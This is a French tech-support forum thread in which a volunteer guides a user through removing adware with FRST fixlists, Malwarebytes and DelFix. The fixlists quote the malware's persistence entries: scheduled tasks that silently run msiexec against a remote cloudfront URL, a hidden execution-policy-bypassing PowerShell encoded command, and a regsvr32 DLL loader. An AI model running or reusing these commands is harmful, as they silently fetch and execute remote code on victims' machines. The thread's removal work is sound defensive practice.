Votre question
Résolu

Virus, Help !

Tags :
  • Windows defender
  • Virus
  • Adware
  • Sécurité
Dernière réponse : dans Sécurité et virus
18 Avril 2017 20:09:58

Bonjour, j'ai attraper un virus et je sais pas comment le retirer, mon windows defender a été bloquer j'ai donc télécharger ZHPCleaner mais le cmd s'ouvre toujours au démarrage aprés les scan et tout le nettoyage que j'ai fais.. Que faire ? Aidez moi please :'( 


Ayant un peu regarder d'autre poste de virus, j'ai effectuer une analyse du logi farbar et je vous laisse les additions et FRST

addition : https://up.security-x.fr/file.php?h=Rdf30accfb189cafa03...
FRST : https://up.security-x.fr/file.php?h=Rfaae871306417d44c9...

Autres pages sur : virus help

18 Avril 2017 21:37:54

Il y a plus rien, plus de pub ni de téléchargement, juste quand je redémarre mon pc, au lancement ya le cmd exe qui se lance, normal ?
m
0
l
19 Avril 2017 11:59:52

J'ai encore Internet explorer qui s'ouvre tout seul, est mon google chrome se ferme, mon windows defender ne voit rien, que faire ?
m
0
l
Contenus similaires
19 Avril 2017 12:02:12

Quelqu'un peut me prendre en charge ? Merci
m
0
l
19 Avril 2017 12:05:06

Le virus bloque l'acces a mon windows defender
m
0
l
19 Avril 2017 12:06:52

up
m
0
l
19 Avril 2017 12:12:01

J'ai vraiment besoin d'aide svp
m
0
l
a c 614 8 Sécurité
19 Avril 2017 12:59:07

Bonjour,

Merci de savoir patienter, nous sommes bénévoles ici, et avons une vie en dehors du forum.

Il est totalement inutile de "spammer" en espérant que cela aille plus vite, on remonte un sujet une fois par jour, c'est tout.

Tes liens de rapports ont été tronqués, et ne sont donc pas lisible

Merci de ré-héberger tes rapports FRST et addition.txt s'il te plait.

:jap: 
m
0
l
a c 614 8 Sécurité
19 Avril 2017 13:37:05

Re,

Inutile de sélectionner "meilleure réponse" tant que la pris en charge n'est pas terminée ... ;) 
Je reçois tes réponses.


Infection par adwares, logiciels publicitaires installés "volontairement", car les utilisateurs de ce pc ne sont pas assez vigilants, et ne décochent pas les sponsors proposés avec l'installation de certains programmes "gratuits".


1) Désinstalle les programmes suivants dans ta liste des programmes (si présents) :

Note : Si tu rencontres une erreur passe au suivant et poursuis la procédure

- AdBlocker (logiciel publicitaire en soi ...)

~~~~~~~~~~~~~~~~~~~~~~~~~~


2)
  • Ouvre le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes)
  • Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes

    start
    CreateRestorePoint:
    CloseProcesses:
    Task: {1BD8C5AF-A75D-42F5-865F-C1E35C7087BD} - System32\Tasks\{6BB2F04C-DC19-47E7-1522-813586C9EB27} => C:\ProgramData\{A86B0A76-1FC0-BDDD-9B39-A63A279ECC31}\C3D8A920-7473-1E8B-4CAC-241BB8D0754E.exe [2017-04-18] () <==== ATTENTION
    Task: {1D7F4B29-F77F-440D-B960-707421B47789} - System32\Tasks\Cherzutain => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XPROX256GB_S251NXAG932423R&d=20170418 /q
    Task: {332C2A7E-CD06-4B34-828F-A9A6876F19CB} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-04-18] ()
    Task: {3E3B9CA7-7F1A-4C4B-A0B8-0A7611DE8274} - System32\Tasks\{66DBAE7A-A2BE-3423-5B42-07098068497E} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c79af028\98fc77e1.dll" <==== ATTENTION
    C:\ProgramData\{A86B0A76-1FC0-BDDD-9B39-A63A279ECC31}
    C:\Program Files (x86)\MIO
    C:\PROGRA~3\c79af028
    Task: {8A822BE1-524C-49AF-B47B-06DB872EF324} - System32\Tasks\{780A0A47-7D7E-0B79-7D11-7D0E7E79110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMA (l'élément de données a 9584 caractères en plus). <==== ATTENTION
    Task: {BFF2D1E8-9F0E-4D58-8972-C410ABE09949} - System32\Tasks\Ckagightkiqerse Agent => C:\Program Files (x86)\Stgrysternaing\xhergasp.exe [2017-04-18] (Google Inc.)
    C:\Program Files (x86)\Stgrysternaing
    Task: {EB4A4F16-E5C4-46A2-9291-7EADA044136C} - System32\Tasks\Samsung Update => msiexec /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=SamsungXSSDX850XPROX256GB_S251NXAG932423R&d=20170418 /q
    ShortcutWithArgument: C:\Users\rototoboys\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7eacadfa43776aec\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData2
    C:\Users\rototoboys\AppData\Roaming\gplyra
    C:\Users\rototoboys\AppData\Roaming\Gugucult
    HKLM\...\Run: [gplyra] => C:\Users\rototoboys\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] ()
    ShellExecuteHooks: Pas de nom - {95A6B2E2-233A-11E7-93BC-64006A5CFC23} - C:\Users\rototoboys\AppData\Roaming\Gugucult\Buhalefoduge.dll [145920 2017-04-18] ()
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
    BootExecute: autocheck autochk * aswBoot.exe /M:cdc17b2 /wow /dir:"C:\Program Files\AVAST Software\Avast"
    Tcpip\..\Interfaces\{df9cb935-bc62-4a57-9144-cd19f00a8aa3}: [DhcpNameServer] 23.12.19.75
    FF NewTab: Mozilla\Firefox\Profiles\d9awmea1.default -> hxxp://www.initialpage123.com/?z=16db40f512b072c23e2c021g9zct0odw1cezez3b7b&from=amz&uid=SamsungXSSDX850XPROX256GB_S251NXAG932423R&type=hp
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\d9awmea1.default -> initialpage123
    FF SelectedSearchEngine: Mozilla\Firefox\Profiles\d9awmea1.default -> initialpage123
    FF Homepage: Mozilla\Firefox\Profiles\d9awmea1.default -> hxxp://www.initialpage123.com/?z=16db40f512b072c23e2c021g9zct0odw1cezez3b7b&from=amz&uid=SamsungXSSDX850XPROX256GB_S251NXAG932423R&type=hp
    FF Extension: (Fast search) - C:\Users\rototoboys\AppData\Roaming\Mozilla\Firefox\Profiles\d9awmea1.default\Extensions\amcontextmenu@loucypher [2017-04-18]
    FF SearchPlugin: C:\Users\rototoboys\AppData\Roaming\Mozilla\Firefox\Profiles\d9awmea1.default\searchplugins\vnbcgnun.xml [2017-04-18]
    CHR HomePage: ChromeDefaultData2 -> hxxp://www.initialpage123.com/?z=16db40f512b072c23e2c021g9zct0odw1cezez3b7b&from=amz&uid=SamsungXSSDX850XPROX256GB_S251NXAG932423R&type=hp
    CHR StartupUrls: ChromeDefaultData2 -> "hxxp://www.initialpage123.com/?z=16db40f512b072c23e2c021g9zct0odw1cezez3b7b&from=amz&uid=SamsungXSSDX850XPROX256GB_S251NXAG932423R&type=hp"
    CHR Profile: C:\Users\rototoboys\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2017-04-18] <==== ATTENTION
    U2 Kitty; C:\Users\rototoboys\AppData\Local\Kitty\Kitty.dll [754688 2017-04-18] (kitty.exe) [Fichier non signé]
    C:\Users\rototoboys\AppData\Local\Kitty
    R2 SNARE; C:\Users\rototoboys\AppData\Local\SNARE\Snarer.dll [793600 2017-04-18] (InterSect Alliance Pty Ltd) [Fichier non signé]
    C:\Users\rototoboys\AppData\Local\SNARE
    R2 WinSAPSvc; C:\Users\rototoboys\AppData\Roaming\WinSAPSvc\WinSAP.dll [590336 2017-04-18] (winsap) [Fichier non signé]
    S2 f8334a5aee5b502865ee42d84bc9c5be; "C:\Program Files\f8334a5aee5b502865ee42d84bc9c5be\8608d520642131803fb1cf255051ad06.exe" [X]
    C:\Program Files\f8334a5aee5b502865ee42d84bc9c5be
    C:\Users\rototoboys\AppData\Roaming\WinSAPSvc
    S2 Recover; C:\Program Files\Reference Assemblies\LAFZNT1J5E9UQCS2WY0W\Dp+dPsEUk1.exe [X]
    R1 7df5e969ffdfe403f2b86c005617b3ed; C:\WINDOWS\system32\drivers\7df5e969ffdfe403f2b86c005617b3ed.sys [8501584 2017-04-13] (MDXHDM) <==== ATTENTION
    C:\WINDOWS\system32\drivers\7df5e969ffdfe403f2b86c005617b3ed.sys
    R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [907160 2017-04-18] () <==== ATTENTION
    S3 aswHdsKe; \??\C:\WINDOWS\system32\drivers\aswHdsKe.sys [X]
    2017-04-18 19:42 - 2017-04-18 19:42 - 00004096 _____ C:\WINDOWS\System32\Tasks\Samsung Update
    2017-04-18 19:42 - 2017-04-18 19:42 - 00003690 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-18 19:42 - 2017-04-18 19:42 - 00003616 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-18 19:42 - 2017-04-18 19:42 - 00000000 ____D C:\WINDOWS\Update
    2017-04-18 19:42 - 2017-04-18 19:42 - 00000000 ____D C:\Users\rototoboys\AppData\Roaming\WinSAPSvc
    2017-04-18 19:42 - 2017-04-18 19:42 - 00000000 ____D C:\Users\rototoboys\AppData\Local\SNARE
    2017-04-18 19:42 - 2017-04-18 19:42 - 00000000 ____D C:\Users\rototoboys\AppData\Local\Kitty
    2017-04-18 19:42 - 2017-04-18 19:42 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-18 18:54 - 2017-04-18 19:42 - 00000000 ____D C:\Program Files (x86)\Chekasecoerlos
    2017-04-18 18:54 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\TDP54TY1PW
    2017-04-18 18:54 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\9Z933CKWUJ
    2017-04-18 18:52 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\f8334a5aee5b502865ee42d84bc9c5be
    2017-04-18 18:52 - 2017-04-18 19:01 - 00000000 ____D C:\WINDOWS\system32\SSL
    2017-04-18 18:51 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\HFH2T3MTM8
    2017-04-18 18:51 - 2017-04-18 19:04 - 00000000 ____D C:\Program Files\1OXALJERY7
    2017-04-18 18:50 - 2017-04-18 18:50 - 00023652 _____ C:\WINDOWS\System32\Tasks\{780A0A47-7D7E-0B79-7D11-7D0E7E79110F}
    2017-04-18 18:47 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\22IVUVHO08
    2017-04-18 18:46 - 2017-04-18 18:46 - 00003982 _____ C:\WINDOWS\System32\Tasks\{6BB2F04C-DC19-47E7-1522-813586C9EB27}
    2017-04-18 18:46 - 2017-04-18 18:46 - 00000000 ____D C:\ProgramData\{A86B0A76-1FC0-BDDD-9B39-A63A279ECC31}
    2017-04-18 18:45 - 2017-04-18 19:20 - 00000000 ____D C:\Program Files (x86)\p4tj8g35BG
    2017-04-18 18:45 - 2017-04-18 18:46 - 00000000 ____D C:\ProgramData\{A5781DA4-12D3-AA0F-40D6-0DA01D1B22A9}
    2017-04-18 18:45 - 2017-04-18 18:45 - 00003892 _____ C:\WINDOWS\System32\Tasks\{66DBAE7A-A2BE-3423-5B42-07098068497E}
    2017-04-18 18:45 - 2017-04-18 18:45 - 00000000 ____D C:\ProgramData\c79af028
    2017-04-18 18:44 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\G5STRVCNW6
    2017-04-18 18:44 - 2017-04-18 19:04 - 00000000 ____D C:\Program Files\SXF9H6EMLL
    2017-04-18 18:44 - 2017-04-18 18:51 - 00000000 ____D C:\Users\rototoboys\AppData\Local\Jeqeshzernely
    2017-04-18 18:42 - 2017-04-18 19:39 - 00624640 _____ C:\WINDOWS\system32\NetUtils2016.dll
    2017-04-18 18:42 - 2017-04-18 19:38 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
    2017-04-18 18:42 - 2017-04-18 19:32 - 00000000 ____D C:\Program Files (x86)\Ckagightkiqerse Agent
    2017-04-18 18:42 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\8OS3KUYP5D
    2017-04-18 18:42 - 2017-04-18 19:10 - 00000000 ____D C:\Users\rototoboys\AppData\Roaming\Gugucult
    2017-04-18 18:42 - 2017-04-18 18:42 - 00006148 _____ C:\WINDOWS\System32\Tasks\Ckagightkiqerse Agent
    2017-04-18 18:42 - 2017-04-18 18:42 - 00006090 _____ C:\WINDOWS\System32\Tasks\Cherzutain
    2017-04-18 18:42 - 2017-04-18 18:42 - 00000000 ____D C:\WINDOWS\system32\sstmp
    2017-04-18 18:42 - 2017-04-18 18:42 - 00000000 ____D C:\Users\rototoboys\AppData\Roaming\gplyra
    2017-04-18 18:42 - 2017-04-18 18:42 - 00000000 ____D C:\Users\rototoboys\AppData\Local\Rzishjerkity
    2017-04-18 18:42 - 2017-04-18 18:42 - 00000000 ____D C:\Program Files (x86)\Stgrysternaing
    2017-04-18 18:41 - 2017-04-18 19:18 - 00000000 ____D C:\Program Files\3QP0QU373F
    2017-04-18 18:40 - 2017-04-18 19:15 - 00000000 ____D C:\Program Files\WO07OQ5IS4
    2017-04-18 18:40 - 2017-04-18 19:10 - 00000000 ____D C:\Program Files\YWOMFJRSKC
    2017-04-18 18:40 - 2017-04-18 19:10 - 00000000 ____D C:\Program Files\OZPCM6KQ6C
    2017-04-18 18:40 - 2017-04-18 18:40 - 00000000 ____D C:\Users\rototoboys\AppData\Roaming\59074706
    2017-04-13 16:00 - 2017-04-13 16:00 - 03118277 _____ C:\WINDOWS\871bd98001b16032d9d78c3e36e98c7f.exe
    2017-04-13 15:55 - 2017-04-13 15:55 - 08501584 _____ (MDXHDM) C:\WINDOWS\system32\Drivers\7df5e969ffdfe403f2b86c005617b3ed.sys
    CMD: ipconfig /flushdns /c
    Hosts:
    EmptyTemp:
    end


  • Enregistre le fichier sur ton Bureau (au même endroit que FRST) sous le nom fixlist.txt
  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe
  • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction

  • Le pc va demander à redémarrer, accepte.
  • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\

    #############

    Télécharge MalwareByte's Anti-Malware :

  • Installe le programme (aide ici)
  • Lance-le et met à jour la base de définition si elle ne le fait pas automatiquement.

  • Choisi ensuite "Analyse" (en haut), puis "Analyse des menaces" puis clique en bas sur "Lancer l'analyse"
  • Si l'outil propose d'autres mises à jour, valide en cliquant sur Mettre à jour maintenant
  • Laisse l'analyse se faire (cela peut durer longtemps).
  • A la fin, si des infections sont détectées, clique sur l'alerte pour afficher les résultats :



  • Coche l'ensemble des éléments détectés (case en haut, à gauche de "Menace") puis clique sur "Supprimer la sélection" en bas. Enfin, clique sur "Terminer"
  • Un redémarrage peut être nécessaire. Accepte en cliquant sur "Oui"

    (aide en images ici)

  • Au redémarrage du PC, relance Malwarebyte's
  • Suis le tutoriel suivant pour exporter le rapport
  • Poste-le dans ta prochaine réponse.

  • Pour les rapports, merci d'utiliser ce service de rapport en ligne : dépose le fichier via "parcourir" et poste simplement le lien obtenu dans ta réponse.
    Une aide à l'utilisation ici
    m
    0
    l
    19 Avril 2017 13:58:54

    J'ai été forcer de changer de pc, impossible d'acceder a google ou a internet explorer et ducoup de te transmettre de fixlog, que faire ?
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 14:05:20

    Re,

    Utilise une clé usb pour copier d'un à l'autre pc, aucun risque de transmettre l'infection.
    m
    0
    l
    19 Avril 2017 14:10:02

    Je peux pas ça me demande de formater le clé, et que je dois mettre a jour mes pilotes
    m
    0
    l
    19 Avril 2017 14:25:34

    C'est bon j'ai réussi a revenir sur mon pc infecté, je rame beaucoup plus que avant, j'ai des pubs sur google.
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 14:55:28

    Re,

    La procédure n'est pas terminée, évite donc de trop utiliser le PC.

    Peux-tu effectuer maintenant la partie avec MalwareByte's que je demandais précédemment s'il te plait ?
    m
    0
    l
    19 Avril 2017 14:56:49

    Oui bien sur, je le fais toute suite.
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 15:16:47

    Re,

    Tu n'as pas respecté la procédure, tu n'as pas validé les éléments trouvé et lancé leur suppression ;) 

    Refais la procédure en sélectionnant l'ensemble des éléments détecté pour la suppression

    Puis fournis-moi le nouveau rapport créé par la suite.

    :jap: 
    m
    0
    l
    19 Avril 2017 15:21:49

    J'ai refait une analyse mais il détecte 0 menace ducoup je ne peut pas afficher les résultats de l'analyse
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 15:50:47

    Re,

    OK alors.

    Peux-tu me refaire ceci pour que je vérifie certaines choses :

    Relance FRST :

    • Double-clique sur l'outil pour le lancer. Quand l'outil se lance, clique sur Oui pour accepter le disclaimer.
    • Assure-toi que les options Addition.txt et "Shortcut.txt" en bas de la fenêtre sont coché.
    • Clique sur le bouton Analyser.
    • L'outil va créer les rapports nommés FRST.txt, Addition.txt et Shortcut.txt, enregistré dans le même dossier que l'outil.


  • Poste les rapports générés.

  • Pour les rapports, merci d'utiliser ce service de rapport en ligne : dépose le fichier via "parcourir" et poste simplement le lien obtenu dans ta réponse.
    Une aide à l'utilisation ici

    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 16:54:51

    Re,

    Le rapport FRST est incomplet, peux-tu me le transmettre à nouveau après t'être assuré qu'il contient bien tout le rapport ?

    As-tu encore les souci de connexion ou les pub sur Chrome ou un autre navigateur à présent ?
    m
    0
    l
    19 Avril 2017 17:26:28

    J'ai redémarré mon pc, au démarrage le cmd s'ouvre plus donc c'est bon mais mon internet explorer s'ouvre et se ferme.. même si j'utilise pas internet explorer. Que penses-tu ?
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 18:09:09

    Re,

    Il y a encore quelques restes à nettoyer :

    • Ouvre le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes)
    • Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes

      start
      CreateRestorePoint:
      CloseProcesses:
      HKU\S-1-5-21-4205000343-963977262-793658436-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)
      HKU\S-1-5-21-4205000343-963977262-793658436-1001\...\Run: [BingSvc] => C:\Users\rototoboys\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2016-04-06] (© 2015 Microsoft Corporation)
      HKU\S-1-5-21-4205000343-963977262-793658436-1001\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
      HKU\S-1-5-21-4205000343-963977262-793658436-1001\...\RunOnce: [Uninstall C:\Users\rototoboys\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\rototoboys\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64"
      HKU\S-1-5-21-4205000343-963977262-793658436-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04192017150957509\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)
      HKU\S-1-5-21-4205000343-963977262-793658436-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04192017150957509\...\Run: [BingSvc] => C:\Users\rototoboys\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2016-04-06] (© 2015 Microsoft Corporation)
      HKU\S-1-5-21-4205000343-963977262-793658436-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04192017150957509\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
      HKU\S-1-5-21-4205000343-963977262-793658436-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04192017150957509\...\RunOnce: [Uninstall C:\Users\rototoboys\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\rototoboys\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64"
      R2 3DM; C:\Users\rototoboys\AppData\Local\3DM\Kitty.dll [754688 2017-04-19] (kitty.exe) [Fichier non signé]
      C:\Users\rototoboys\AppData\Local\3DM
      EmptyTemp:
      end


    • Enregistre le fichier sur ton Bureau (au même endroit que FRST) sous le nom fixlist.txt
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur FRST.exe
    • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction

    • Le pc va demander à redémarrer, accepte.
    • L'outil va créer un rapport de correction Fixlog.txt. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 18:36:21

    Re,

    Est-ce que tu as encore IE qui se lance après redémarrage à présent ?
    m
    0
    l
    19 Avril 2017 18:41:11

    C'est quoi iE ?
    m
    0
    l
    19 Avril 2017 18:42:00

    Ah mais il ne se lance pas au démarrage, c'est moi quand je le lance manuellement il se referme 3 secondes a peu prés
    m
    0
    l
    19 Avril 2017 19:04:56

    J'ai fais toute les étapes, je viens de redémarrer mon pc, j'ouvre IE et il se referme..
    m
    0
    l
    19 Avril 2017 19:05:43

    A par ça, plus de pub/rame
    m
    0
    l
    a c 614 8 Sécurité
    19 Avril 2017 20:33:31

    Re,

    Tu utilisais Internet Explorer avant ce problème et les infections présente ? Il fonctionnait ?
    m
    0
    l
    19 Avril 2017 21:19:31

    Non je n'utilise jamais IE, j'aime pas. Mais il fonctionnait je pense.
    m
    0
    l
    19 Avril 2017 23:54:22

    Ouais pas de prob, j'ai eu le message suivant : Le programme de protection des ressources Windows n’a trouvé aucune violation d’intégrité.
    m
    0
    l
    a c 614 8 Sécurité
    20 Avril 2017 09:06:42

    Re,

    Ok, peux-tu démarrer Internet Explorer sous ce mode spécial sans qu'il se referme ?

    Dans la recherche, tape :
    iexplore.exe -extoff

    Valide avec "entrée", valide l'avertissement.
    m
    0
    l
    20 Avril 2017 11:32:20

    Bonjour,

    Je rentre se mode dans l'invite de commandes ? Si oui ça marche pas. "'iexplore.exe' n’est pas reconnu en tant que commande interne
    ou externe, un programme exécutable ou un fichier de commandes."
    m
    0
    l
    a c 614 8 Sécurité
    20 Avril 2017 12:28:43

    Re,

    Non je n'ai pas dis l'invite de commande, j'ai bien dis ta recherche ;) 

    L'encart de recherche de ton menu démarrer ou bien en appuyant simultanément sur la touche "Windows" et "R"


    m
    0
    l
    20 Avril 2017 12:33:58

    Oui il s'ouvre bien, mais c'est pas le IE de windows 10 ?
    m
    0
    l
    20 Avril 2017 16:00:19

    Re, désolé pour l'erreur, j'ai fais la manip mais ça change rien. Edge se referme.
    m
    0
    l
    a c 614 8 Sécurité
    20 Avril 2017 17:36:23

    Re,

    Bon ben désolé, mais je n'ai pas touché à Edge dans ma procédure, les rapports ne montre rien, Edge n'a ni addon, ni modification, donc c'est probablement lié à Windows 10 ou un autre logiciel, un bug quoi.

    Il faut espérer que cela soit réparé lors d'une prochaine mise à jour.

    Tu fais bien les mises à jour de Windows 10 ?
    m
    0
    l
    20 Avril 2017 22:56:03

    Oui, je fais toute mes maj win10
    m
    0
    l
    a c 614 8 Sécurité
    21 Avril 2017 19:48:43

    Re,

    Je n'ai pas de solution à te proposer, sauf réinstaller Windows 10.

    Je n'ai effectué aucune manipulation lié de près ou loin à Edge, donc je pense que le problème était antérieur à ta prise en charge, ou bien lié à un bug actuel de Windows 10
    m
    0
    l
    21 Avril 2017 20:47:27

    hyunkel30 a dit :
    Re,

    Je n'ai pas de solution à te proposer, sauf réinstaller Windows 10.

    Je n'ai effectué aucune manipulation lié de près ou loin à Edge, donc je pense que le problème était antérieur à ta prise en charge, ou bien lié à un bug actuel de Windows 10


    Bah écoute, pour l'instant même avec ce bug, ça va beaucoup mieux donc jvais laisser comme ça ^^ Je te remercie beaucoup, tu as sauvé une vie :lol: 
    m
    0
    l
    a c 614 8 Sécurité
    21 Avril 2017 21:29:49

    Re,

    Pour conclure alors :

    Télécharge DelFix (de Xplode) sur ton bureau.

  • Ferme toutes tes fenêtres, puis double clique sur DelFix.exe pour le lancer.
    (Utilisateur de Vista/Windows 7 faites un clic droit -> "Exécuter en tant qu'administrateur")
  • Ne touche pas aux options cochées
  • Coche en plus "Purger la restauration système"
  • Clique sur le bouton "Exécuter"
  • Laisse travailler l'outil.
  • Le rapport est enregistré dans à la base de ton disque dur, (C:\DelFix.txt généralement) merci de copier-coller son contenu dans ta prochaine réponse.

    ~~~~~~~~~~~~~~~~~~


    Prévention :

    Ton PC a été infecté par des adwares, à savoir des logiciels potentiellement indésirables qui se mettent en place lors des installations de logiciels.

    Il faut donc que les utilisateurs de ce PC veillent à ne pas donner leur accord pour que ceux-ci s'installent lors des installations de logiciels (en décochant par exemple les cases précochées qui autorisent l'installation d'un moteur de recherche).

    Pour éviter de te faire réinfecter par des adwares à l'avenir, entraîne-toi à ne pas tomber dans leurs pièges en utilisant cet outil :

    Télécharge Adware Prevention (de guigui0001) sur ton bureau.

    Sous IE9, IE10, IE11 et Windows 8 le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même

    • Lance-le en double-cliquant sur Adware_Prevention.exe
    • Cet outil va simuler une installation sponsorisée par des adwares. Fais alors en sorte, tout au long de la pseudo-installation, de ne pas te faire piéger en étant vigilant.
    • A la fin de cette fausse installation, l'outil fait un bilan de tes décisions. Suis attentivement les conseils qu'il te donne.

      Tutoriel en images

    • Adopte alors la même vigilance lors de tes futures installations, qui seront réelles cette fois-ci !


  • Note : cet outil pédagogique tant à évoluer en permanence, n'hésite pas à remonter les problèmes rencontrés ou les suggestions pour son amélioration

    ~~~~~~~~~~~~~~~~~~~~

    Pour aller plus loin dans ta protection et éviter de te faire réinfecter voici quelques conseils supplémentaires :

  • Attention lors de l'installation de logiciel :
    Veiller à toujours lire les conditions d'utilisation (CLUF), afin de déceler la gestion des données personnelles, l'installation de sponsors publicitaires ou tout autre atteintes à la vie privée. Refuser les toolbars et autres addons proposés.
    A lire ! et à lire

  • Firefox et/ou Chrome offrent une meilleure sécurité par rapport à Internet Explorer, surtout si on les complète de quelques plugins très intéressant : Noscript par exemple pour Firefox.
    Ghostery ou Scriptsafe pour Chrome.

  • Maintenir ses logiciels et son système à jour :
    De nombreuses infections sont dû à des failles de windows, mais aussi de logiciel tiers, comme Sun Java, Adobe Acrobat Reader, etc
    Tu peux utiliser un outil comme SXCU pour vérifier occasionnellement les mises à jour disponibles pour les principaux logiciels/plugins.

    Enfin, le plus important reste ton comportement sur ton PC, tu restes la plus importante protection : Évites les comportement à risque : P2P, cracks, téléchargements et installations douteux via des pubs, les messageries instantanées, ou des sites inconnu, sites pornographiques.
    A lire !
    Ici aussi !

    Tu peux indiquer ton sujet "réglé" en validant avec "Sélectionner comme meilleure solution" (en bas à gauche de ce message), ton sujet sera alors automatiquement marqué comme "résolu"

    A bientôt sur les forums Tom's Guide
    :jap: 
    m
    0
    l
    23 Avril 2017 00:53:18

    # DelFix v1.013 - Rapport créé le 23/04/2017 à 00:50:52
    # Mis à jour le 17/04/2016 par Xplode
    # Nom d'utilisateur : rototoboys - DESKTOP-KBKD1L3
    # Système d'exploitation : Windows 10 Pro (64 bits)

    ~ Suppression des outils de désinfection ...

    Supprimé : C:\FRST

    ~ Purge de la restauration système ...

    Supprimé : RP #50 [Windows Update | 04/22/2017 11:52:51]

    Nouveau point de restauration créé !

    ########## - EOF - ##########
    m
    0
    l
        • 1 / 2
        • 2
        • Dernier
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS